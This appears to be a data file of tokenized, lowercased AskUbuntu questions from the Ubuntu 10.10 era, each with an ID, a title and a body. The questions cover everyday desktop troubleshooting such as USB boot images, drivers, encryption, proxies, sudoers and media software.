7221	zcat fails to make a boot image for ubuntu usb	/dev/sdb1 on /media/3433-3231 type vfat ( rw , nosuid , nodev , uhelper=udisks , uid=1001 , gid=1002 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush ) ... that 's what mount says about the drive root @ gemeni : /home/a1 # zcat -v boot.img.gz > /dev/sdb1 boot.img.gz : gzip : stdout : no space left on device ... there 's the response i get when trying zcat on the boot image to the unmounted drive at /dev/sdb1 root @ gemeni : /home/a1 # zcat boot.img.gz > /dev/sdb bash : /dev/sdb : no medium found ... is what happens when i try plain old sdb i 'm working from this tutorial
7225	sort music by metadata	is there an easy way to organize all my music files by artist , album etc . ? i would like to organize all the music files in ~/music in folders by their metadata . so the directory structure would look like this : music/ artist name/ album name/ song.mp3 is there a tool for this purpose ?
7240	how do i play .swf files ?	does anyone know what libraries i have to install to play .swf files ?
7241	no `` keep in launcher '' command in launcher menu for some applications	hi , i have some applications installed which do n't have a `` keep in launcher '' option in launcher right-click menu . these apps ( emacs for example ) were installed via ubuntu software manager . windows 7 can do it , you know .
7246	google earth and skype theme	i use google earth and skype since version jaunty , and so far emulation qt theme for gnome runs perfectly , but when i use the default theme ambiance and radiance in maverick , both applications look bad . qt theme is not integrated with gtk . especially for the equinox engine ( it 's cool theme ) . to outsmart , i stole the lucid 's ambiance and radiance standard themes for use in the maverick . is any another solution for the default theme ambiance and radiance in maverick run perfectly on both the application ? and especially for the theme equinox .
7248	using axis2/java to generate code from wsdl	i 'm trying to use axis2/java to consume web services . in particular , i 'm trying to generate java skeleton code from a wsdl file . i installed the libaxis-java package , but the package does n't contain the wsdl2java.sh script i was expecting . i tried to generate the java code by doing : java -cp /usr/share/java/axis.jar org.apache.axis.wsdl.wsdl2java foo.wsdl but i get the following error : exception in thread `` main '' java.lang.noclassdeffounderror : org.apache.commons.logging.logfactory at org.apache.axis.components.logger.logfactory.class $ ( logfactory.java:45 ) at org.apache.axis.components.logger.logfactory $ 1.run ( logfactory.java:45 ) at java.security.accesscontroller.doprivileged ( native method ) at org.apache.axis.components.logger.logfactory.getlogfactory ( logfactory.java:41 ) at org.apache.axis.components.logger.logfactory. < clinit > ( logfactory.java:33 ) at org.apache.axis.i18n.projectresourcebundle. < clinit > ( projectresourcebundle.java:53 ) at org.apache.axis.i18n.messagesconstants. < clinit > ( messagesconstants.java:32 ) at org.apache.axis.utils.messages. < clinit > ( messages.java:36 ) at org.apache.axis.wsdl.wsdl2java. < clinit > ( wsdl2java.java:112 ) could not find the main class : org.apache.axis.wsdl.wsdl2java . program will exit .
7255	is the swap partition encrypted ?	selecting the encryption option at install time to encrypt the home partition . does this enable encryption of the swap partition or is the swap partition unencrypted . if the swap partition is unencrypted , how do i encrypt the swap and home partitions .
7256	live cd kernel panic	i 'm an ubuntu user since hardy heron and even in other distros , i 've never been through such thing . i ca n't install ubuntu 10.10 on my notebook , because i simply ca n't even start the live cd ... i always get the following message : kernel panic - not syncing attempted to kill init ! see the complete message in this pic :
7257	is it possible to create an ad-hoc wi-fi connection ?	i ca n't connect my ubuntu client on a wi-fi ad-hoc connection . i tried windows xp and 7 on server , no success . i ca n't use linux on server , only windows . thanks . realtek rtl8187b .
7264	why does n't 3d acceleration work ?	hello first of all and sorry if my english is hard to understand hehe i 've been using ubuntu since 9.04 and i used the 3d effects . but since the 9.10 version , the drivers stop working . i have a nvidia geforce 5200fx and everytime i download and install the driver the resolution changes to 640x480 and i ca n't change it to 1024x768 again . i tried everything , even using 3d acceleration with nouveau drivers ( in this case , my resolution does n't change , but anyway i ca n't use the 3d effects ) . i know that my video card is very old , but is there a way to make it work ?
7269	the connection of wine and playonlinux	i 'm about to install wine on my new ubuntu 10.10 installation , however i ca n't determaine if i should install wine or playonlinux . i 've already read over the following page http : //wiki.winehq.org/playonlinux , however the differences are not very clear and i do n't understand if i just have to install wine or both or just playonlinux . also could someone tell me if playonlinux is an add-on for wine or not ? if it is then it would certainly clear a lot for me . and do i need winetricks ?
7273	how to stay productive ? what time management software is available ?	so since i started using askubuntu.com i 've spent entirely too much time here answering other people 's questions . now maybe someone could help me with that by answering this one . i 'm looking for time management software for ubuntu . there are a number of these programs floating around for windows . rescuetime is one that is very popular . the key features that i 'd like to see in a linux app that rescuetime has are : automatically records what application you are using , including what websites you visit . reports and graphs on your time usage . notifications for when you have spent too much time on `` distractions . '' while rescuetime does n't officially support linux , there is an open source rescuetime linux uploader . unfortunately , it seems to only support firefox and epiphany for website tracking . i 'm a chromium user . the other major drawback to rescuetime is that it is a web service . i 'd much rather not upload detailed information about how i spend my time to some third party . google already knows too much about me as it is . project hamster , a gnome time management app , comes so close . sadly , it does not automatically track what you are doing . if i had enough discipline to manually report to an applet what i was up to , i doubt i 'd need this . ( how cool would it be if they provided some zeitgeist integration to handle that part ? )
7274	mounting a remote drive and setting user-id	i 'm about to do a fresh install of 10.10 desktop on my work pc . i previously had 10.04 and i had the /home of our main server mounted to /mnt/home . i remember back then i had to change my local user id to match that used on the id of my user on the remote server , so i will have the correct permissions to all my files . my question is whether i can set this id during the setup or must i do it post installation ( effectively changing the automatically assigned id ) . also , is that the best practice to work on a mounted location or is there anything more elegant ?
7277	live cd works ok. is it ok to assume a new install will work ?	i 've got a toshiba a505 laptop and tried the live cd with great results . however , i have n't found any reports on this pc working 100 % ok on ubuntu 10.10 yet . i do have seen ( and tried installing myself ) some reports that 10.04 did n't work ( without some dirty hacking ) . in regular circumstances , is it ok to assume that a new install will work if the live cd works ? are there any tools i can run to check compatibility ? thanks !
7278	synaptics touch pad disable button not functional	i have a compaq presario cq60-307ea laptop which has the synaptics touchpad . it works fine , but one thing that 's never worked is the disable button above it , which should completely turn off the touchpad . but when the disable button is pressed nothing happens , the light changes to orange like it should , but it is n't disabled and is still active . i was wondering if anyone had got their synaptics touchpad disable button to work . i find it strange as my friend has a compaq presario cq61 which is a slightly different model , but still has the synaptics touchpad and his disable button worked fine , yet mine does n't . any help on getting it to work would be great ! thanks !
7283	where can i find vim 7.3 ?	vim 7.3 is out , but not available in the sources . where can i get an installation package for the 7.3 version ? i do n't want to install it manually .
7285	autostart of the xserver at boot up when the monitor is unplugged	i was running xubuntu 8.04 `` hardy heron '' . i configure the vnc by adding vino-server to the autostarted app . i accessing the display only via vnc , so i removed the monitor and ir worked fine . when i upgrade to 10.04 `` lucid lynx '' , i was unable to connect . i borrow back the monitor and i plug it . i was seeing nothing so i do a restart by ssh . when it restart , i was able to vnc without an issue . i removed the monitor and worked like that for a few week , but when i installed some update , i needed to restart . after the restart , the vnc is not available . when i to a ps -aux by ssh , the xserver does not seem to be running . how could i tell xubuntu 10.04 to automatically start the xserver when no monitor is plug , just as 8.04 ? thanks
7288	how to configure fluxbox menu ?	how do you modify the default fluxbox menu ?
7290	what 's a good rhythmbox replacement ?	i 'm looking to get rid of rhythmbox as my primary music player . preferably something that allows multiple folders for the music library and has support for the new sound indicator . mostly i want more playback options that rhythmbox lacks like a related suffle or mood shuffle type of thing . also , auto rating based on listening habits would be nice ( like rhythmbox used to have ) . i have tried exaile and banshee . but i could n't add more than one folder to my library . let me know what you all have experienced with various different players . even some good rhythmbox plugins to add these types of features would be great .
7292	is there a way to autodetect when a display is disconnected ?	i am running ubuntu on a dell latitude with the latest nvidia drivers . basically what i want is when i disconnect my external display that everything goes back to the main one without having to change the config every time . any help is welcome !
7295	how to turn off the display via the command line ?	is there a way to turn off the display ( enter power saving mode ) using a command ? for example , when the computer is inactive for a specific interval , the screen turns off to conserve energy . is there a way to manually turn off the screen , yet keep the computer running normally ? this is a notebook , so there 's no 'power-off ' button on the monitor itself .
7310	mount a partition on login ?	i have a partition to hold my media files and photos . but it does not mount automatically . so for when i open shotwell it lists all my photos as `` missing '' until i open the partition in nautilus and then restart shotwell . is there a way to have it mount on login ?
7321	rename music files with missing file extensions	i 've been trying out a few different music players recently and noticed that some ( a lot ) of my music would be missing from the library . it turns out that at some point , a plethora of my music files lost their .mp3/.ogg/.flac file extensions . i 'm honestly not sure how this happened , but i 'm confident it was something i did mistakenly ( or maybe i thought it would n't matter since file extensions are mostly cosmetic anyway ) . so i need to get these file extensions back . i 've looked into pyrenamer , but i ca n't figure out how to match it to files without an extension and then tell it to add the correct file extension depending on the actual type of the file . i 've also looked at easytag . however , it also recognizes music files based entirely on their file extensions . so the music i want to fix does n't even show up . brilliant . any thoughts on how to do this ? i certainly do n't mind some command line , i 'm just not sure which tools would be best and i also suck at regex .
7324	how can i add favorites in kubuntu network release maverick ?	since the upgrade of my netbook from lucid knr to maverick knr , it is not possible anymore to add to the favourites on the search and launch site . the `` stars '' to add an icon to the favourites is not shown anymore , neither is the `` - '' -sign on the favourites to remove them . how can i fix this ?
7332	good screencasting programs for ubuntu ?	what are the best video screen capturing programs for ubuntu as far as reliability , performance , and ease of use go ?
7340	how can i replace pulseaudio with alsa ?	i was wondering if there was an easy way of replacing pulseaudio with alsa . pulseaudio is the biggest problem i am currently having with ubuntu and i really want these problems to end .
7342	how do i integrate an application in the sound menu using python ?	i do n't necessarily expect a whole tutorial for creating a sound indicator entry here on askubuntu , but i 've searched and searched , and i ca n't seem to find any documentation on creating a sound indicator . preferably , i 'd like to be able to do this in python . can someone point me in the right direction ? ?
7347	how can i make my pinnacle pctv hd pci card work in lucid or maverick ?	i have pinnacle pctv hd pci card . i am able to view and hear atsc/qam channels with this card using kaffeine . i can also view all of the analog channels . the problem is that there is no sound in tvtime . here 's my card info : 05:05.0 multimedia video controller : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder ( rev 05 ) subsystem : pinnacle systems inc. device 0051 control : i/o- mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 ( 5000ns min , 13750ns max ) , cache line size : 64 bytes interrupt : pin a routed to irq 20 region 0 : memory at f9000000 ( 32-bit , non-prefetchable ) [ size=16m ] capabilities : < access denied > kernel driver in use : cx8800 kernel modules : cx8800 05:05.1 multimedia controller : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder [ audio port ] ( rev 05 ) subsystem : pinnacle systems inc. device 0051 control : i/o- mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 ( 1000ns min , 63750ns max ) , cache line size : 64 bytes interrupt : pin a routed to irq 20 region 0 : memory at fa000000 ( 32-bit , non-prefetchable ) [ size=16m ] capabilities : < access denied > kernel driver in use : cx88_audio kernel modules : cx88-alsa 05:05.2 multimedia controller : conexant systems , inc. cx23880/1/2/3 pci video and audio decoder [ mpeg port ] ( rev 05 ) subsystem : pinnacle systems inc. device 0051 control : i/o- mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 64 ( 1500ns min , 22000ns max ) , cache line size : 64 bytes interrupt : pin a routed to irq 20 region 0 : memory at fb000000 ( 32-bit , non-prefetchable ) [ size=16m ] capabilities : < access denied > kernel driver in use : cx88-mpeg driver manager kernel modules : cx8802 if i do this : '' arecord -d hw:1,0 -f dat | aplay '' i get sound but the volume control in tvtime does n't work . i can however adjust the volume with the alsa-plugin device in pulseaudio . what i want is for tvtime to work as it should . thanks
7351	play a movie in the desktop as a wallpaper ?	i was wondering is there a way to play movies in the desktop , like a background ? or is it not possible ?
7352	what software is there for brainstorming ?	i am beginning to write some short stories and i am trying to find some software that may aide me in brainstorming .
7353	does ubuntu encrypt the home folder by default ?	my laptop has been stolen and it contained highly sensitive data . i did have a password that was required to login , but i am unsure if my data is safe . ( at this point the data is more valuable than the laptop , so it 's a big concern for me ) i remember ubuntu having an option to encrypt the home folder on installation , but i do n't remember if i picked it or not . what is the default ( 10.04 ) ? also was there a way for me to tell during usage or is it completely transparent ?
7354	how to hide the titlebar in opera ?	i just did a fresh installation of ubuntu 10.10 64-bits on my notebook . downloaded the opera 10.63 .deb package ( http : //www.opera.com/browser/download/ ) and installed it . now i want to know if there 's a way to remove the titlebar to make the browser look like the windows version .
7367	enabling off workspace window positioning under gnome/compiz	is there any option available for enabling window positioning into an off viewable area under compiz on gnome ? by default , any window that 's to be positioned off workspace will be forced to fit into the viewable area .
7369	pitivi crashes with segmentation fault on importing .mp4 files	my video camera records onto a memory card which mounts in ubuntu with no problem . i see a bunch of .mp4 files , but what software do i use now ? i installed pitivi and repeatedly tried to import the folder of .mp4 files but it keeps crashing after importing a few of them . i tried running pitivi from the command line to see if it output any messages , but all i saw were errors about creating thumbnails and then `` segmentation fault '' . now what ?
7372	how to reduce the tearing while watching videos ?	i 'm using the ubuntu 10.10 with both vlc player and mplayer and already installed the ati drivers . i watched the same videos on windows 7 and ubuntu . but on ubuntu the images have a lot of tearing . i tried some newbish-configs on my ati config tool , but nothing changed . i tried videos in mkv , avi , rmvb ... and in all kinds of resolutions . i would love to see some tips or maybe a solution to this problem . ( i have searched for similar questions but i did n't find any : / ) the english is not my primary lang so sorry for my mistakes . thanks in advance ! [ ] 's leonardo my hw config ( acer aspire 5740g-6979 ) -ati mobility radeon 5650 -intel core i5-430m -4gb ram
7373	how to install libreoffice ? ( replacing openoffice.org )	on 10.10 how do i get rid of openoffice.org , and install libreoffice without borking my system ?
7377	how to start an app with `` always on top '' set ?	there are a couple of applications that i find myself marking as `` always on top '' every time i use them , so i wonder if there is a way to automatically set them as so , whatever way i start them ( menu , shell , gnome-do ) ?
7390	right click does n't work on hp mini 210 touchpad	need help in getting the right mouse click to work on a hp mini 210-1015tu when using the touchpad . if i plug in a usb mouse , both left click and right click function as normal . using the touchpad however i can only get the left click to work . attempting to right click gives the result expected from a left click . as per some comments on a forum i added a file 11-touchpad.conf to /usr/share/x11/xorg.conf.d . i can provide further details if required . this made touchpad operation noticeably smoother but the problem with the right mouse click remains . not a hardware problem as right clicked worked with 10.04 and still works with windows 7 starter . 10.10 installed using wubi .
7391	is there a dreamweaver html editor replacement ?	i used adobe 's dreamweaver for working on web pages and various text editors . i already have a few favorite text editors but could n't find a good replacement for dreamweaver ? is there any recommended html wysiwyg editors ? thanks !
7403	gstreamer vaapi problem	i installed gstreamer-vaapi from this ppa : ppa : guido-iodice/video sudo apt-get install gstreamer0.10-vaapi libgstvaapi-x11-0 libgstvaapi0 but , if i run totem movie player ( via terminal ) it 's show this error : ( totem:3383 ) : glib-gobject-warning ** : g_object_set_valist : object class 'totemscrsaver ' has no property named 'reason' ( totem:3383 ) : glib-gobject-warning ** : value `` 10752000 '' of type 'guint ' is invalid or out of range for property 'connection-speed ' of type 'guint' libva : libva version 0.31.0 xlib : extension `` xfree86-dri '' missing on display `` :0.0 '' . libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/dri/nvidia_drv_video.so libva error : /usr/lib/dri/nvidia_drv_video.so init failed libva : va_opendriver ( ) returns -1 segmentation fault it 's seems i get wrong nvidia_drv_video.so . what should i do ? if i uninstall it , it 's work fine , but i want to use this vaapi backend for my video decoding via gpu while i run gstreamer based apps . ps : i use ubuntu lucid 64bit and msi cr 400 notebook : intel core 2 duo nvidia 8200m
7404	can i run a command within another command ?	can i run a command within another command for example : twidge update date 'date ' being the bash command 'date ' so effectively , twidge will update twitter with today 's date . *twidge is a cli based twitter client
7409	only view the cpu temperature from command `sensors`	ok , so when i run the command : sensors i get a truck load of info : atk0110-acpi-0 adapter : acpi interface vcore voltage : +1.16 v ( min = +0.85 v , max = +1.60 v ) +3.3 voltage : +3.39 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.17 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +12.36 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 1906 rpm ( min = 600 rpm ) chassis fan speed : 0 rpm ( min = 600 rpm ) cpu temperature : +31.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +32.0°c ( high = +45.0°c , crit = +95.0°c ) what would the command be if i just wanted to see this : cpu temperature : +31.0°c ( high = +60.0°c , crit = +95.0°c ) or better yet , just this : cpu temperature : +31.0°c
7411	changing media key defaults in gnome	under xfce , i had option to set my keyboard media keys to run particular programs or scripts . i understand the options to adjust the keyboard shortcuts under gnome , but how do i change the default programs that the keys use . for example , i have a script i use that manages my calculator ( in this case , galculator ) . this script not only launches an instance of galculator but makes sure that another instance is not running . so unlike the default manner under gnome , if one instance is already running , it just brings focus to it ) . i am not having 15 different calculators to close out in the end . i have tried looking under gconf and keyboard shortcuts . any other ideas ?
7417	what way is best for backing up apache2 , mysql , cvs and webmin configuration files	i 've ubuntu 9.10 cloud servers running . i 'll be using server administering gui tool 'webmin ' for backing up resources like apache configuration files , mysql , cvs , the directory /var/www , and the entire webmin configuration files . sometimes these are not backed up and i will check them with their date of modification . is there a best way to backup all the above resources without any flaw with any other tool or from command line ?
7418	why does n't the new version of ubuntu 10.10 show up in update manager ?	i am currently using ubuntu 10.04 lts and when i run the update manager it does n't show the new release . i have checked the `` software sources '' update tab to make sure `` release upgrade '' is set to normal . i 'm receiving updates from the `` main server '' . i 've tried running update-manager and checking a few times to make sure there 's nothing to update to i 've run `` update-manager -c '' i 've run `` update-manager -d '' but it still does n't show , and i ca n't find an answer on google . i turn to you , help !
7426	installing new kernel ( by commandline ) as side of old kernel	i need to install another kernel ( 2.6.34 ) into my fedora/ubuntu machine ( x86 ) and i need to show the old and new boot up options in the boot menu ( both new and old kernel ) i have downloaded the new kernel and i need to compile it and need to build it . how can i complete this from start to finish ?
7427	beginner 's guide to fluxbox	gnome and kde seem to be pretty straightforward and certainly seem to be the most user friendly in terms of getting setup and running quickly with anything the average user would want to do . i am working on implementing fluxbox on my current install of ubuntu 10.04 and keep running into gotcha 's that require a lot of time to research and then configure . in light of my experiences with fluxbox , i 'm posting a list of questions ( much in the spirit of this question from stackoverflow . please list one answer per bullet item and then edit the question so that the link goes directly to the answer . and if you think of anything missing , please add it and then post your answer . how to install fluxbox ? how do i edit the menu ? how to lock my screen ? how to configure fluxbox to work with two screens ? how to configure my keyboard shortcuts ? how to enable automounting of devices ? how to install new fonts ? recommend guides / tutorials ubuntu forums guide fluxbox wiki
7429	remove welcome screen from live usb ?	i created a live ubuntu 10.10 with persistent storage on a usb drive . on every boot the welcome screen appears where you can select the language and choose to try ubuntu live or to install ubuntu . i 'd like to remove this screen and have ubuntu directly start into live mode with a specific language . how could i achieve that ?
7430	how to generate xorg.conf ? ( x -configure segfaults )	my video card is working fine , i have no screen problem . i am trying to generate an xorg.conf so i did : [ logout ] sudo service gdm stop [ move away xorg.conf.back and xorg.conf.fglrx-0 that were in /etc/x11 ] sudo dpkg-reconfigure xserver-xorg sudo x -configure but this last command segfaults : x.org x server 1.7.6 release date : 2010-03-17 x protocol version 11 , revision 0 build operating system : linux 2.6.24-27-server i686 ubuntu current operating system : linux nico 2.6.32-25-generic # 44-ubuntu smp fri sep 17 20:26:08 utc 2010 i686 kernel command line : boot_image=/boot/vmlinuz-2.6.32-25-generic root=uuid=7447ab16-3406-442d-81e5-bb6a2d795205 ro quiet splash build date : 21 july 2010 12:47:34pm xorg-server 2:1.7.6-2ubuntu7.3 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.16.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : fri oct 15 16:06:11 2010 list of video drivers : i740 ark geode siliconmotion mach64 s3 r128 apm intel neomagic vesa trident chips s3virge fglrx sis savage rendition i128 tseng ztv mga openchrome radeon ati nv v4l vmware cirrus tdfx nouveau sisusb voodoo fbdev ( ee ) ca n't load firegl drm library ( libfglrxdrm.so ) . backtrace : 0 : x ( xorg_backtrace+0x3b ) [ 0x80e938b ] 1 : x ( 0x8048000+0x61c8d ) [ 0x80a9c8d ] 2 : ( vdso ) ( __kernel_rt_sigreturn+0x0 ) [ 0x34d410 ] 3 : x ( xf86calldriverprobe+0x182 ) [ 0x80b82d2 ] 4 : x ( doconfigure+0x1c8 ) [ 0x816b898 ] 5 : x ( initoutput+0x1da ) [ 0x80b98aa ] 6 : x ( 0x8048000+0x1ebbb ) [ 0x8066bbb ] 7 : /lib/tls/i686/cmov/libc.so.6 ( __libc_start_main+0xe6 ) [ 0x467bd6 ] 8 : x ( 0x8048000+0x1e961 ) [ 0x8066961 ] segmentation fault at address ( nil ) caught signal 11 ( segmentation fault ) . server aborting please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log note the line ca n't load firegl drm library ( libfglrxdrm.so ) note : i do have file /usr/lib/fglrx/xorg/modules/linux/libfglrxdrm.so it is strange that it segfaults whereas i can use gnome with no problem but well ... might be related : i tried to install the driver from ati 's website recently , and from then glxgears crashes at start . how can i generate xorg.conf in those conditions ? it might or might not involve solving the segfault problem .
7433	applications that are not installed appear in unity ?	when browsing the unity menu , i get strange entries . such as if i search `` monitor '' for system monitor , i get entries for camera monitor and battery monitor , things i know are not installed . is that normal ?
7436	how do i rename a mounted truecrypt volume ?	when i mount the truecrypt file on my usb drive it shows up as truecrypt1 . the volume is fat , using mtools to rename a volume label involves e2label /dev/sdbx , however truecrypt1 does not map to a physical partition . fdisk -l does not show the volume partition ( only the physical usb device ) , and df -h lists the volume path as /dev/mapper/truecrypt1 . finally , using the nautilus 'rename ' context action , gives the error : `` sorry , could not rename `` truecrypt1 '' to `` towel '' : operation not supported by backend '' . apparently this can be done in win , but how can i rename this volume in ubuntu ? as nicolas said , specifying the mount point names the partition the same . the truecrypt gui does not remember the mount point i set , so i specify the mount points in a script which i placed in my main menu . # ! /bin/bash gksudo truecrypt /media/usbdrive/encryptedfile /media/securedata/
7443	preseeding the installer ?	i need to preseed a dual boot installation of ubuntu 10.04 . i want partman to use all already existing linux partitions and all free space ( like the option when installing fedora 13 ) . what would that recipe look like ?
7444	1tb sata hdrive on marvell adapter disappears after 10.10 upgrade - why ?	thanks for taking the time . i have a problem i 've never had after an upgrade . one of my hard drive , a 1tb ntfs drive connected with the marvell sata connector ( 88sx or smth like that ) to my asus p5q-e motherboard is not seen , and therefore unmountable in ubuntu . the problem is n't with the drive or other hardware , because windows 7 sees it fine ( in dual boot ) . plus it worked just fine before i upgraded . and so for nearly a year . the problem is n't with ntfs libs , because ubuntu sees the win7 ntfs partition just fine . so i can only guess that the problem is with ubuntu . because the 10.10 live cd does n't see it iether . the 10.04 livecd , however , does see it and mounts the drive , which means it really is 10.10 's problem . what should i do ? ... . downgrading excluded : - ) ! see images for proof . i 've tried updating grub ( someone suggested it might work ... ) , installing all the ntfs libs , adding it to fstab ( as it was before , in 10.04 ) , ... but all that failed . grub update did nothing , niether did the ntfs libraries . the fstab edit just caused the boot time to take hours , and come back with errors saying it could n't mount the drive , but not really saying why . any idea for resolving my bug ? thanks .
7445	information explaining the relationship between debian and ubuntu	please post articles or blog posts that detail the relationship between debian and ubuntu ( negative/positive ) that you find insightful/useful/excellent ... and please do n't limit this to just the os , but also the rest of their respective eco-systems .
7446	how do i set up remote desktop ?	i have some user accounts in my ubuntu 10.04 and i want them to login from all over the world and access their data using internet and of course i want any of my users to be able to access only their own user and to be able to change data . what should i do ? are there any remote desktop apps ?
7454	how to make the most of dual monitors ?	i 've recently acquired a second screen for my laptop . the external one is , of course , way bigger than the integrated one . so i 've been wondering , how do you guys set up your ubuntu for two monitors ? the thing is , i 'm quite often on the move without my second screen , so i ca n't really put panels to the second one , as those would be cramped into the first one , once i unplug the second one , right ? also , same goes for windows i arranged and resized on the big screen . another point would be the wallpaper . at the moment , i 'm using a wallpaper that 's 1920x1980 ( i use 1920x1080 and 1440x900 in a vertical alignment ) and set the display mode to `` stretch '' , so it covers both desktops . any easier methods ? do n't want to doctor around my wallpapers with gimp all the time . as to window window management , i 'm currently using compiz and docky . docky is placed on the top side of the bottom ( laptop ) monitor so it stays where it was even when the top monitor is n't plugged in . what about window placement ? my current setup involves using google chrome on the top monitor , taking up half of my screen width and being used for regular browsing . next to it is another google chrome window , with the usual `` app tabs '' of gmail , facebook , google reader and twitter . auxilliary stuff goes to the bottom monitor . so , how are you guys using your dual monitor setup ? any awesome programs i 'm missing out on ? maybe one that activates different `` configurations '' ( wallpaper , panels , etc ) , depending on how many screens there are ?
7461	how can i know if my pc has the right drivers ?	i 'm new to linux , i got myself an ubuntu 10.04 i think that the audio drivers are n't working well , since the sound is not as good as before ( on windows ) . i also think the graphic drivers are n't working well , since the pc freezes after ubuntu login , if i set the `` visual effects '' on anything higher than `` none '' . i have a 945gct-m2 motherboard with the built-in graphic card and audio card . how do i know if i have the right drivers , or check if the hardware is working correctly ? ps : remember that i 'm new to ubuntu so i do n't have all the knowledge required .
7464	ubuntu-font in other distros	i would like to test the new sabayon 5.4 on my pc.since i love the new ubuntu-font installed by default on maverick i wonder how can i install it on sabayon or any other distro.thank you in advance !
7470	how to run `` sudo apt-get update '' through proxy in commandline ?	in my office i want to update and download through ( wget ) and here they are using proxy ? how can i do this by commandline ?
7475	aptitude in ubuntu 10.10	aptitude command is missing from ubuntu 10.10 . i just installed it using apt-get install aptitude but it does n't support autocompletion as it was doing in the previous version of ubuntu . and as a relatively new user i find aptitude with autocompletion of packages names is way easier to use . so how to bring autocompletion back to aptitude on 10.10
7477	how can i add a new user as sudoer using the command line ?	after i add a user using adduser , i ca n't see it via system- > administration- > users and groups unless i logout and then login again . is that normal ? also , can i set a newly added user as a sudoer or do i have to change that only after adding it ? how can i do that via the shell ? finally , can i delete the original user that was created upon initial installation of ubuntu , or is this user somehow 'special ' ?
7479	how can i remove the skype panel icon ?	as i use the docky skype indicator , and the green skype icon does n't look good next to all the grey ones -- it would be nice to remove the icon from the system tray . is this possible ? how can i do it in ubuntu 12.04 -- or other earlier versions ?
7480	how can i change which programs are listed in the context menus for files in nautilus ?	i 'd like to know how to change some entries makes in 'second button list ' , that list of programs associated with a file icon . some i would like to remove and others i would like to put in .
7483	how to make money from/in ubuntu/linux ?	i 'm a student right now , and later in life i 'd like to get really involved in the linux ecosystem . however i recognize the need to put bread on the table , so my question is : how can i make money from ubuntu/linux ? the situation right now is that my college can offer me windows certification , or apple engineer certification ; both of these do not enthrall me as i 'd like to stick mostly to linux . what job types normally deal with it , what training/certification should i be looking for ?
7485	battery not detected	as the title say my laptop battery is not detected in maverick . i 'm using ubuntu since ever and i 've never come across this problem . i have a msi ms-171f vr705 series and everything is working fine except for the battery . cat : /proc/acpi/battery/bat1/info : no such device
7489	how to get the native version of spotify running ?	a while ago spotify ( the streaming music service ) came out with a preview for linux of their client . i had succesfully run it throughout 10.04 . now i 'm on 10.10 , i ca n't seem to find it in the package manager , let alone install it . software sources gives me this ; failed to fetch http : //repository.spotify.com/dists/stable/release unable to find expected entry non-free/source/sources in meta-index file ( malformed release file ? ) some index files failed to download , they have been ignored , or old ones used instead . so what should i do , as i 'm paying for spotify ?
7498	how do i install skype ?	i want to install skype , but i ca n't locate it in software center or by using synaptic package manager . can anyone help me ?
7502	capture stdout and stderr of all gui programs ?	when a gui program malfunctions in some way ( crashes , etc . ) i often use the trick of running it from the command line ( instead of from the menu ) . that way i see the messages it outputs to stdout and stderr which sometimes gives me a clue as to what went wrong ( or at least a message i can google to take me further down the `` solution path '' ) . is there any way i can get all gui programs to save their stdout and stderr somewhere so i can diagnose problems without having to start them from the command line ? not only would this be more convenient , it would help users who do n't know about this trick .
7509	changing the colour of 'string ' in gedit when typing c++	i 'm using gedit to write c++ code , and have applied my custom syntax colour scheme which works ( and looks ) great with the exception of the string type , which , for both my custom style and the various bundled styles , is the same colour as the rest of the text . i am able to access the xml files that contain the style settings and there is no setting for defining the colour of string . does anyone know how i can do this ?
7510	how can i change the appearance of kde applications ?	i use gnome . i want to change the appearance of kde applications such as amarok . the colors in amarok do n't match the rest of my applications . how can i customize them ?
7512	removing fedora 13 and installing ubuntu 10.10	i have used 10.04 for a while using the wubi installation with windows xp . i then uninstalled it and gave fedora 13 a try ( on its own partitions ) . now i would like to completely get rid of fedora and install ubuntu 10.10 ( not using the wubi , but the real thing this time ) , so i will have a dual boot with my xp . what 's the best way to do that ? the only caveat is that i do n't have the xp cd in hand ( i know it 's needed sometimes to run fixmbr from recovery console to get rid of grub ) . i can ask for the cd from our admin but it would take a couple of days .
7515	use a different dns server for some specific domains	i want to use a different dns server for some specific domains that are blocked by the default dns server . and i dont wan na change my default dns server for some reason . is there any way of doing this without installing my very own dns server ? i 've just learn that this is possible in mac : http : //hints.macworld.com/article.php ? story=2004062902195410
7516	organizing software - where in the filesystem ?	i guess it 's also a matter of personal taste , but since i 'm starting with a fresh 10.10 install i thought maybe this time i 'll keep my system more organized . what is/are the conventional place ( s ) to store software and applications ? i have some stuff i get using git ( e.g . bioperl ) , there are some apps i simply download and extract to some place ( e.g . eclipse ) and obviously i install software using apt-get . where is the conventional place to put all of these ?
